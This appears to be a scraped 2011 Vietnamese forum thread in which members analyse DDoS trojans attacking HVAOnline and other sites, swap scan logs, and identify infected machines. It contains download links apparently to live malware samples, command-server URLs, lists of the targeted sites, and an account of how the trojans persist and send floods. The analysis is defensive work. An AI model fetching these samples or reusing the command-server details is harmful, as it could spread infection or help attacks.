Vấn đề PR thì cái nào hơn bạn? Thực ra BKIS cũng nên reg một cái nick chính thức, tham gia tích cực RCE ở chủ đề này, thì ít nhiều cũng được thiện cảm của anh em IT, nhất là những anh em hay sinh hoạt ở HVA. Kể cả khi bác TQN kêu khản cổ, các anh ấy vẫn im lặng. CMC thì chí ít còn có được bạn B***89. ]]>
/hvaonline/posts/list/39641.html#245714 /hvaonline/posts/list/39641.html#245714 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Mình chỉ tức là họ được tạo điều kiện và có rất nhiều thời gian mà họ không giúp đỡ nhiệt tình như cái vụ giúp anh Hàn Quốc chẳng hạn. trong khi đó con virus này nó ảnh hưởng tới cộng đồng người Việt nhiều như vậy. Mỗi người 1 suy nghĩ nên mình không tranh luận thêm về vấn đề này. 
Theo mình thì HVA đã, đang và sẽ không bao giờ cần sự giúp đỡ nào từ Bkis. Diễn đàn HVAOnline cũng là nơi mà không thể dùng đồng tiền để quảng cáo cho các sản phẩm và dịch vụ của Bkav với sự "bảo kê" từ ban quản trị diễn đàn như các nơi khác, họ (Bkav) không cử người vào đây chính thức là hiển nhiên dù HVAOnline là một diễn đàn có sức ảnh hưởng rất lớn.]]>
/hvaonline/posts/list/39641.html#245716 /hvaonline/posts/list/39641.html#245716 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245718 /hvaonline/posts/list/39641.html#245718 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem wrote:
http://www.mediafire.com/?fbffz39h68qm7wu Em xin lỗi vì hôm qua đưa không kịp thời. đây là goopdate.dll của em, em chưa zip ạ.:D 
Cám ơn em. Đã download và đang phân tích.]]>
/hvaonline/posts/list/39641.html#245721 /hvaonline/posts/list/39641.html#245721 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem wrote:
http://www.mediafire.com/?fbffz39h68qm7wu Em xin lỗi vì hôm qua đưa không kịp thời. đây là goopdate.dll của em, em chưa zip ạ.:D 
File này là của Google, không phải virus STL.]]>
/hvaonline/posts/list/39641.html#245728 /hvaonline/posts/list/39641.html#245728 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst wrote:
...................................... - E vừa quét xong = BK pro + kis 2012 up date ngày hôm nay : 23/8/2011 luôn với 2 file anh TQN up lên MF là AcrobatUpdater_20_08_2011 và 15_8_2011 => Kis không ho he gì 2 file này cả , BK thì phang đc 1 em 15_8 còn 20_8 thì im re . Các file cũ của anh TQN up lên em chưa thử nên không biết như thế nào - Em không quảng cáo hay làm gì đó BKis đâu nhé  
Anh TQN mới đây đã RCE và uplpad lên mang 2 file virus của STL: - AcrobatUpdater_15_08_2011 - AcrobatUpdater_20_08_2011 Tôi đã thử nghiệm trên thưc tế file (process) AcrobatUpdater.exe lấy từ AcrobatUpdater_20_08_2011 sau khi unzipped. Đây là một DDoS tool (virus) của STL đang tiến hành DDoS vào HVA. Tôi đã thông báo kết quả thử nghiệm chi tiết trong topic này. Khi tôi thử thì Avira không detect đươc AcrobatUpdater.exe này là virus-trojan. Còn hôm nay thì Avira đã detect đươc, cụ thể như sau Avira updated 24-8-2011 phát hiện - AcrobatUpdater.exe (20-8) là Trojan TR/VB.AGS.3 - images01.gif (20-8- file đi kèm AcrobatUpdater.exe) cũng là TR/VB.AGS.3 - AcrobatUpdater.exe (15-8) là Trojan TR/VB.alf.2 - images01.gif (15-8- file đi kèm AcrobatUpdater.exe) cũng là TR/VB.alf.2 Kaspersky antivirus updated 23-8-2011 (hôm qua) thì không phát hiện ra virus trong tất cả 4 file nói trên. McAfee version 8.8 Enterprise cũng vậy, như KAS. Tôi đã hoàn tất kết quả thử nghiệm một DDoS tool mới của STL là SbieSvc.exe (đi kèm với SbieMgm.dll) và dự kiến đặt tên nó là TRJ/hvadetec-2. Có những điểm thú vị, các bạn đón đọc ]]>
/hvaonline/posts/list/39641.html#245730 /hvaonline/posts/list/39641.html#245730 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245732 /hvaonline/posts/list/39641.html#245732 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen?


IP address: 1.55.112.150
Time: 2011-08-24T03:58:34Z
URL: http://danlambaovn.blogspot.com/2011/08/yeu-nuoc-chan-chinh-thanh-ra-phan-ong.html
giật mình không biết máy mình có bị virus STL không vậy, căn bản con lap em dùng thì thằng bạn suốt ngày vào mấy trang web linh tinh, mình thì cũng ít khi dùng toàn ra ngoài quán. bật wireshark lên thì thấy.
Bật thử task manager lên thì thấy.
em không có kinh nghiệm về kiểm tra virus lắm, không biết máy em có bị dính hàng của Sờ Ti Lợn không mấy anh nhỷ, nhưng tìm trong máy không thấy mấy cái Adobe Update với Google Chrome.]]>
/hvaonline/posts/list/39641.html#245733 /hvaonline/posts/list/39641.html#245733 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/ Lưu ý: Mình chỉ nhận xem các file log cho các máy tính có triệu chứng nhiễm virus của STL rõ ràng. Các bạn có thể dùng tắt tất cả các trình duyệt web trên máy, sau đó TCPView, SmartSniff hay các chương trình tương tự để xác định máy tính của bạn có kết nối tự động đến một trong các website sau hay không:
1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com 10. http://vietnamnet.vn 11.  
Nếu có thì bạn vui lòng ghi rõ website nào mà máy tính của bạn đang tự động kết nối đến vì mình chỉ kiểm tra cho các máy nào có dấu hiệu nhiễm virus của STL.]]>
/hvaonline/posts/list/39641.html#245734 /hvaonline/posts/list/39641.html#245734 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem wrote:
- Cảm ơn anh Conmale. :D - Anh Bolzano_1989 coi luôn giùm em file googlecrashhandler.exe luôn nha anh. Link đây ạ: http://www.mediafire.com/file/ql94xm0w3fs9gmg/GoogleCrashHandler.exe - Hôm nay em thấy file này mới xuất hiện: GoogleCrashHandler.exe-0BB7A0D9.pf , em không biết có liên quan gì không nên up lên luôn, đây là link: http://www.mediafire.com/file/kndjsmdp8pf6ok2/GOOGLECRASHHANDLER.EXE-0BB7A0D9.pf - Đây là file goopdate.dll em đưa link lên lại: http://www.mediafire.com/file/fbffz39h68qm7wu/goopdate.dll Cảm ơn mọi người.  
Đấy đều là các file lành cả, không phải virus STL đâu :) .]]>
/hvaonline/posts/list/39641.html#245735 /hvaonline/posts/list/39641.html#245735 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong wrote:
Hôm nay sáng dạy, phải vào đọc mấy trang tin tức 1 cái. Chả lẽ lại lên vnexpress.net đọc mấy cái truyện cười, hay lên 24h.com.vn đọc mấy cái truyện tình dục :( thế là thôi ta lớn rồi phải đọc thông tin tình hình đất nước :*- vô ngay danlambaovn Code:
Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen?


IP address: 1.55.112.150
Time: 2011-08-24T03:58:34Z
URL: http://danlambaovn.blogspot.com/2011/08/yeu-nuoc-chan-chinh-thanh-ra-phan-ong.html
giật mình không biết máy mình có bị virus STL không vậy, căn bản con lap em dùng thì thằng bạn suốt ngày vào mấy trang web linh tinh, mình thì cũng ít khi dùng toàn ra ngoài quán. bật wireshark lên thì thấy. .................................................... Bật thử task manager lên thì thấy. ....................................... em không có kinh nghiệm về kiểm tra virus lắm, không biết máy em có bị dính hàng của Sờ Ti Lợn không mấy anh nhỷ, nhưng tìm trong máy không thấy mấy cái Adobe Update với Google Chrome. 
Máy em chắc chắn là nhiễm Virus-DDos tool của STL, loai TRJ/hvadetec-2, hay variant của nó. Nhìn tên các máy mục tiêu (vietan.org) và những lỗi xảy ra trong quá trình kết nối-tấn công DDoS là thấy rõ vài vấn đề. Tôi sẽ phân tích kỹ trong bản báo cáo thử nghiệm sắp tới. Các DDoS tool của STL thường là các Hiden process nên trên Task manager của Windows có thể không thấy. Ngoài ra việc tìm ra các folder-file lạ trong hệ thống cũng không dễ. Vì máy ta thường cài rất nhiều application và các DDoS tool-virus STL luôn mạo tên hoặc dùng tên file "thấy quen quen thế nào ấy". Hì hì ]]>
/hvaonline/posts/list/39641.html#245737 /hvaonline/posts/list/39641.html#245737 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong wrote:
Hôm nay sáng dạy, phải vào đọc mấy trang tin tức 1 cái. Chả lẽ lại lên vnexpress.net đọc mấy cái truyện cười, hay lên 24h.com.vn đọc mấy cái truyện tình dục :( thế là thôi ta lớn rồi phải đọc thông tin tình hình đất nước :*- vô ngay danlambaovn Code:
Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen?


IP address: 1.55.112.150
Time: 2011-08-24T03:58:34Z
URL: http://danlambaovn.blogspot.com/2011/08/yeu-nuoc-chan-chinh-thanh-ra-phan-ong.html
giật mình không biết máy mình có bị virus STL không vậy, căn bản con lap em dùng thì thằng bạn suốt ngày vào mấy trang web linh tinh, mình thì cũng ít khi dùng toàn ra ngoài quán. bật wireshark lên thì thấy. Bật thử task manager lên thì thấy. em không có kinh nghiệm về kiểm tra virus lắm, không biết máy em có bị dính hàng của Sờ Ti Lợn không mấy anh nhỷ, nhưng tìm trong máy không thấy mấy cái Adobe Update với Google Chrome. 
Em khoan động đậy gì cái máy nha. Chắc chắn máy em bị nhiễm rồi. Cứ làm theo hướng dẫn mà bolzabo_1989 đưa ra và gởi thông tin lên đây.]]>
/hvaonline/posts/list/39641.html#245739 /hvaonline/posts/list/39641.html#245739 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/  
Đây là file log em đã scan như anh hướng dẫn. Code:
http://www.mediafire.com/?h5pm1q12r1h2ycm
Hiện tại em đang ở trường, nên trước khi scan log với TCPView em có kiểm tra lại với Wireshark thì không thấy máy mình kết nối tới viettan.org nữa, mặc dù từ lúc scan log wireshark kia xong em tắt máy tính và đến trường luôn, không động chạm gì đến hệ thống. Nếu cần scan lại log TCPView khác thì khi về nhà em sẽ scan lại với TCPView rồi gửi log lên sau]]>
/hvaonline/posts/list/39641.html#245744 /hvaonline/posts/list/39641.html#245744 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong wrote:

bolzano_1989 wrote:
Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/  
Đây là file log em đã scan như anh hướng dẫn. Code:
http://www.mediafire.com/?h5pm1q12r1h2ycm
Hiện tại em đang ở trường, nên trước khi scan log với TCPView em có kiểm tra lại với Wireshark thì không thấy máy mình kết nối tới viettan.org nữa, mặc dù từ lúc scan log wireshark kia xong em tắt máy tính và đến trường luôn, không động chạm gì đến hệ thống. Nếu cần scan lại log TCPView khác thì khi về nhà em sẽ scan lại với TCPView rồi gửi log lên sau 
Không thấy gì đáng ngờ. Chỉ có cái unikeyNT kia không biết có phải là đồ xịn không. Tí nữa về, thử chạy lại TCPView coi thử nhe em? Nếu có bất cứ kết nối nào ra ngoài cũng chộp hết (và nhớ đừng khởi động bất cứ trình duyệt nào hết).]]>
/hvaonline/posts/list/39641.html#245745 /hvaonline/posts/list/39641.html#245745 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
CMC InfoSec sẽ cập nhật mầm virus này sớm nhất có thể sau khi xác nhận đây là virus. Anh chị em kiểm tra nếu trong máy tính nào có file ở đường dẫn trên, vui lòng gửi cho mình và anh TQN gấp, xin cảm ơn. @anh conmale: File Unikeynt kia là file gốc của Unikey, chúng ta không cần phải lo.]]>
/hvaonline/posts/list/39641.html#245753 /hvaonline/posts/list/39641.html#245753 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Nhiều khả năng là nó đây rồi: c:\program files\kaspersky lab\kaspersky password manager\de_stpass_.exe Bạn gửi file này gấp cho mình qua địa chỉ email sau:
CMC InfoSec sẽ cập nhật mầm virus này sớm nhất có thể sau khi xác nhận đây là virus. Anh chị em kiểm tra nếu trong máy tính nào có file ở đường dẫn trên, vui lòng gửi cho mình và anh TQN gấp, xin cảm ơn. @anh conmale: File Unikeynt kia là file gốc của Unikey, chúng ta không cần phải lo. 
đây là bản crack Kaspersky Password Manager Premium của thằng bạn em chính tay nó Crack. nó đưa cho em dùng. không biết nó có gửi "hàng" vào máy em không :| Code:
http://www.mediafire.com/?3fh3xpfejqcbusx
em đã send email cho anh file này. EDIT tránh spam

conmale wrote:
Không thấy gì đáng ngờ. Chỉ có cái unikeyNT kia không biết có phải là đồ xịn không. Tí nữa về, thử chạy lại TCPView coi thử nhe em? Nếu có bất cứ kết nối nào ra ngoài cũng chộp hết (và nhớ đừng khởi động bất cứ trình duyệt nào hết). 
Vào sáng nay tự dưng thấy FF bị treo nên mới tắt đi scan thử bằng Wireshark và thấy có viettan.org nên em mới thấy lạ, vì em chưa vào site này bao giờ. mấy trang thông tin tự do em vào chỉ có danlambaovn.blogspot.com và X-cafevn.org (trang này là nhờ Sờ Ti Lợn hack rồi đi rêu rao nên em mới biết đề vào đọc bài, X-cà có khi phải cám ơn STL đã PR giúp). Chiều nay vừa về nhà bật máy tính lên, tắt hết firefox. yahoo, tắt luôn cả cái protect của avast rồi em dùng wireshark để capture network lại thì không thấy cái viettan.org nào nữa :( Code:
http://www.mediafire.com/?7bb0oxqxfhroi89
Đây là log TCPView khi em scan tại nhà Code:
http://www.mediafire.com/?22c34bgzj7vnt31
Nếu như máy em không bị virus mà vì lý do nào đó mà tự nhiên sáng nay capture bằng wireshark lại lòi ra mấy cái packet NBNS đến viettan.org mà làm mất thời gian của nhiều anh em trên hva thì em xin lỗi :D hì hì. Thông tin mới nhất: Đang post bài này lên, tự dưng làm trái ý anh conmale để Firefox và bật 4 tab:
rồi em bật Wireshark thì túm được 1 đống packet send tới viettan.org, may là có cái log này, không lại mang tiếng là đồng bọn của STL cố tình gây mất thời gian của anh em HVA thì chết. FF của em rất hay bị đơ, sử dụng khoảng 1 -> 2 phút thậm chí có thể ngắn hơn là bị not responding liên tục. chắc là do cái này ... Log wireshark: Code:
http://www.mediafire.com/?ykv5h6di1kmv50m
Log mới với Autotuns, Autorunsc và TCPView cho anh bolzano_1989: Code:
http://www.mediafire.com/?zm5serhuk3bwfxe
]]>
/hvaonline/posts/list/39641.html#245757 /hvaonline/posts/list/39641.html#245757 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245761 /hvaonline/posts/list/39641.html#245761 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. MSHelpCenter.exe. File (process) này (cùng với một số file khác) đươc tạo lập từ một file Unikey (bị cài lén virus), khi người dùng cài nó vào máy. File Unikey có virus được download từ trên mạng. Tuy nhiên sau khi đươc tạo lập, file MSHelpCenter.exe này thưc tế không tạo ra được các kết nối- tấn công DDoS vào các máy mục tiêu. Hiện tượng này có lẽ xuất phát từ việc file có những lỗi (bug) sau khi được STL soạn thảo hay cải tiến từ một file khác. DDoS tool thứ hai của STL là AcrobatUpdater.exe. File (process) này đươc giấu (embedded) trong một file ảnh, download về từ một webserver do STL quản lý. File nào của STL đã được cài sẵn trong máy, đóng vai trò một Trojan-downloader để download file ảnh nói trên về máy nạn nhân, thì còn cần được kiểm tra thêm. Khi được cài vào máy, file AcrobatUpdater.exe tạo lập một đường dẫn riêng trong thư mục C/WINDOWS/Program Files/ (trong Win XP và Win 2K3...), cũng như tự copy mình vào thư mục "Startup" để khởi động cùng với Windows khi nó start (boot) hay restart và tạo lập các (2) registry liên quan. Ngay khi được cài vào máy hay ngay sau khi Windows restart, AcrobatUpdater.exe khởi phát ngay quá trình tấn công DDoS vào các webserver của HVA với nhịp độ tấn công khá nhanh và khá mạnh, khoảng từ 4-10 packets (SYN type-62Bytes)/giây. Trong quá trình DDoS thì STL bot cũng kết nối đến master webserver của STL, download về máy nạn nhân một file ảnh, để update DDoS tool. DDoS tool này được HVA đặt tên là TRJ/hvadetec-1. DDoS tool AcrobatUpdater.exe này dường như STL soạn thảo để "ưu tiên" tấn công DDoS vào một mục tiêu duy nhất là HVA, chỉ riêng HVA mà thôi. TRong khi thì DDoS tool thứ ba của STL là SbieSvc.exe thì lai được bố trí để DDoS vào nhiều mục tiêu trong cùng một lúc (thí dụ danlambao, viettan....). Chúng tôi DDoS tool này của STL là TRJ/hvadetec-2. Như vậy ít nhất là còn một DDoS tool điển hình nữa của STL đã và đang tấn công vào trang mạng vietnamnet.vn. Như trường hợp HVA, có lẽ DDoS tool này cũng được bố trí để chỉ "ưu tiên" tấn công vào vietnamnet.vn, chỉ mình vietnamnet.vn mà thôi. Khi có kết quả thử nghiệm thưc tế DDoS tool này chúng tôi sẽ đặt tên cho nó là TRJ/hvadetec-3. Dĩ nhiên là STL có thể điều khiển các DDoS tool thay đổi muc tiêu. Nhưng tình hình những tháng vừa qua là được STL bố trí, dàn xếp như vậy Mô tả quá trình gây nhiễm, kích hoạt của DDoS tool SbieSvc.exe (TRJ/hvadetec-3) và các đăc điểm của nó như sau: 1- (còn tiếp) ]]> /hvaonline/posts/list/39641.html#245763 /hvaonline/posts/list/39641.html#245763 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/  
Đây là 3 file lần lượt theo thứ tự trên kiểm tra giùm em với có bị nhiễm virut ko thanks. http://www.mediafire.com/?9qb9w359wqaoco6 http://www.mediafire.com/?q0zfn30rcnehias http://www.mediafire.com/?cqqul3dk23blwrw ]]>
/hvaonline/posts/list/39641.html#245767 /hvaonline/posts/list/39641.html#245767 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

hailua_online wrote:

bolzano_1989 wrote:
Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/  
Đây là 3 file lần lượt theo thứ tự trên kiểm tra giùm em với có bị nhiễm virut ko thanks. http://www.mediafire.com/?9qb9w359wqaoco6 http://www.mediafire.com/?q0zfn30rcnehias http://www.mediafire.com/?cqqul3dk23blwrw  
Các file log của máy bạn đều ổn ;) . Máy tính của bạn có kết nối tự động đến website nào trong các website sau không?
1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com 10. http://vietnamnet.vn 11.  
]]>
/hvaonline/posts/list/39641.html#245774 /hvaonline/posts/list/39641.html#245774 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245776 /hvaonline/posts/list/39641.html#245776 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn wrote:
Thời điểm giờ em không vào được http://vietnamnet.vn/ . Có ai vô được không mọi người? Em dùng mạng FPT. 
Vào được nhưng chậm.]]>
/hvaonline/posts/list/39641.html#245777 /hvaonline/posts/list/39641.html#245777 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:

hailua_online wrote:

bolzano_1989 wrote:
Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/  
Đây là 3 file lần lượt theo thứ tự trên kiểm tra giùm em với có bị nhiễm virut ko thanks. http://www.mediafire.com/?9qb9w359wqaoco6 http://www.mediafire.com/?q0zfn30rcnehias http://www.mediafire.com/?cqqul3dk23blwrw  
Các file log của máy bạn đều ổn ;) . Máy tính của bạn có kết nối tự động đến website nào trong các website sau không?
1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com 10. http://vietnamnet.vn 11.  
 
Máy em chỉ tự động vào mỗi thôi ạ]]>
/hvaonline/posts/list/39641.html#245778 /hvaonline/posts/list/39641.html#245778 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Bạn đừng gửi log Autoruns ở máy tính của bạn nữa, mà gửi 2 log sau cho mình OTL và OTS, bạn hãy bật tất cả những gì mà bạn vừa sử dụng khi nãy, tái lập lại hiện tượng kết nối đến các website lạ kia rồi scan và gửi log: Hướng dẫn scan và gửi log OTL http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-otl/ Hướng dẫn scan và gửi log OTS http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-ots/ Mình tin là máy tính của bạn không bị nhiễm virus của nhóm STL ;) . Mình thấy có một khả năng lớn là có máy tính khác trong cùng mạng nội bộ của bạn bị nhiễm virus STL hoặc là một số người trong cùng mạng của bạn đang vào website viettan.org . Tốt nhất là bạn scan và gửi log Autoruns và Autorunsc ở tất cả các máy đang chạy trong cùng mạng khi xảy ra hiện tượng này cho mình, nhớ đánh số để phân biệt các log cùng máy tính đi kèm và việc truy tìm mẫu virus thuận tiện cho bạn :) . 
Em đã send log OTL và OTS qua email của anh rồi. Em dùng Wifi chùa :D tự dưng nhắm mắt mơ mơ màng màng đoán được cái wifi hàng xóm để dùng :D đỡ tốn tiền mạng :D nên chắc là không thể scan các máy khác cho anh được. thôi thì thằng khác bị kệ nó vậy :-< chạy sang nhà nó nó lại tắt wifi đi thì khổ :D ]]>
/hvaonline/posts/list/39641.html#245779 /hvaonline/posts/list/39641.html#245779 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://net.iadze.com/backgrounds.jpg và showthread.php: http://net.iadze.com/showthread.php đã hoàn toàn giống nhau. Danh sách các site đang bị DDOS: Code:
http://www.aihuuphuyen.org
 http://nguoiduatinkami.wordpress.com
 http://vrvradio.com
 http://aotrangoi.com
 http://viettan.org
 http://dangviettan.wordpress.com
 http://radiochantroimoi.com
 http://radiochantroimoi.wordpress.com
 http://chutungo.wordpress.com
 http://nguoivietphanlan.forumotion.com
 http://exodusforvietnam.wordpress.com
Sao không đốt danlambao nữa mấy anh ? Chán rồi à ! Hiện tại, sau khi kiểm tra các file GoogleCrashHandler.exe và dll mà các bạn gởi lên, tôi tạm xác định đấy là các file sạch của Google, và xin lỗi các bạn. Nếu các bạn kiểm tra các file đó có Digital Signature của Google thì có thể "tạm" yên tâm, không cần upload. Vậy là tới đây chúng ta vẫn chưa tìm được mẫu đang ddos Vietnamnet. Mong bà con tiếp tục dùng TCPView và SmartSniff: http://www.nirsoft.net/utils/smsniff.html để tiếp tục monitor và tìm exe nào đang ddos Vietnamnet. PS: 2 hailua_online: Cậu up giùm tôi các file này nhé: 1. c:\program files\common files\adobe\switchboard\switchboard.exe 2. c:\program files\internet download manager\idman.exe Cảm ơn trước.]]>
/hvaonline/posts/list/39641.html#245800 /hvaonline/posts/list/39641.html#245800 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245813 /hvaonline/posts/list/39641.html#245813 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet
Địa chỉ download file ituneshelp http://www.mediafire.com/?my3ge2sqvnlno76 13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt? 2 bolzano_1989: đây là mấy file log lấy được bằng cách scan OTL , OTS . http://www.mediafire.com/?5rh2d5a4yhtdh2h ]]>
/hvaonline/posts/list/39641.html#245820 /hvaonline/posts/list/39641.html#245820 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Sáng nay, kiểm tra lại thử target DDOS của mấy anh stl, thấy mấy anh đã loại danlambao.blogspot.vn ra khỏi danh sách. Tới giờ, content của backgrounds.jpg: http://net.iadze.com/backgrounds.jpg và showthread.php: http://net.iadze.com/showthread.php đã hoàn toàn giống nhau. Danh sách các site đang bị DDOS: Code:
http://www.aihuuphuyen.org
 http://nguoiduatinkami.wordpress.com
 http://vrvradio.com
 http://aotrangoi.com
 http://viettan.org
 http://dangviettan.wordpress.com
 http://radiochantroimoi.com
 http://radiochantroimoi.wordpress.com
 http://chutungo.wordpress.com
 http://nguoivietphanlan.forumotion.com
 http://exodusforvietnam.wordpress.com
Sao không đốt danlambao nữa mấy anh ? Chán rồi à ! Hiện tại, sau khi kiểm tra các file GoogleCrashHandler.exe và dll mà các bạn gởi lên, tôi tạm xác định đấy là các file sạch của Google, và xin lỗi các bạn. Nếu các bạn kiểm tra các file đó có Digital Signature của Google thì có thể "tạm" yên tâm, không cần upload. Vậy là tới đây chúng ta vẫn chưa tìm được mẫu đang ddos Vietnamnet. Mong bà con tiếp tục dùng TCPView và SmartSniff: http://www.nirsoft.net/utils/smsniff.html để tiếp tục monitor và tìm exe nào đang ddos Vietnamnet. PS: 2 hailua_online: Cậu up giùm tôi các file này nhé: 1. c:\program files\common files\adobe\switchboard\switchboard.exe 2. c:\program files\internet download manager\idman.exe Cảm ơn trước. 
Hai file đó nằm trong này anh. http://www.mediafire.com/?b8t7784kbhaub4d]]>
/hvaonline/posts/list/39641.html#245821 /hvaonline/posts/list/39641.html#245821 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245823 /hvaonline/posts/list/39641.html#245823 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao wrote:
